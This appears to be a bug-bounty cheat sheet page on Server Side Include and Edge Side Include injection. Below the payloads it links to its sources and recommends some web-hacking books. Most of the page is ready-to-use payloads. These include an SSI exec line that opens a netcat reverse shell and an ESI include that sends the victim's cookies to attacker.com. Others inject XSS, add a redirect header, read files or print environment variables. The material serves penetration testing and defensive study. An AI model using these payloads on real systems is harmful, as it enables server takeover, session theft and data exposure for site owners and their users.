SSI / ESI Injection

Server Side Include Injection

SSI, Server Side Include Injection

1. Print a date

<!--#echo var="DATE_LOCAL" -->

1. Print all the variabels

<!--#printenv -->

1. Include a file

<!--#include file="includefile.html" -->

1. Doing a reverse shell

<!--#exec cmd="mkfifo /tmp/foo;nc IP PORT 0</tmp/foo|/bin/bash 1>/tmp/foo;rm /tmp/foo" -->

Bug-Bounty-Methodology/Server Side Include Injection.md at main · trilokdhaked/Bug-Bounty-MethodologyGitHub

ESI, Edge Side Inclusion

Description	Payload
Blind detection	<esi:include src=http://attacker.com>
XSS	<esi:include src=http://attacker.com/XSSPAYLOAD.html>
Cookie stealer	<esi:include src=http://attacker.com/?cookie_stealer.php?=$(HTTP_COOKIE)>
Include a file	<esi:include src="supersecret.txt">
Display debug info	<esi:debug/>
Add header	<!--esi $add_header('Location','http://attacker.com') -->
Inline fragment	<esi:inline name="/attack.html" fetchable="yes"><script>prompt('XSS')</script></esi:inline>

Payload

Auto_Wordlists/ssi_esi.txt at main · carlospolop/Auto_WordlistsGitHub

Resources

Server Side Includes (SSI) & Edge Side Includes (ESI)Medium

SSI injection

Server Side Include Injection - Payloads All The Things

Interesting Books

Interesting Books

Disclaimer: As an Amazon Associate, I earn from qualifying purchases. This helps support this GitBook project at no extra cost to you.

• The Web Application Hacker’s Handbook The go-to manual for web app pentesters. Covers XSS, SQLi, logic flaws, and more
• Bug Bounty Bootcamp: The Guide to Finding and Reporting Web Vulnerabilities Learn how to perform reconnaissance on a target, how to identify vulnerabilities, and how to exploit them
• Real-World Bug Hunting: A Field Guide to Web Hacking Learn about the most common types of bugs like cross-site scripting, insecure direct object references, and server-side request forgery.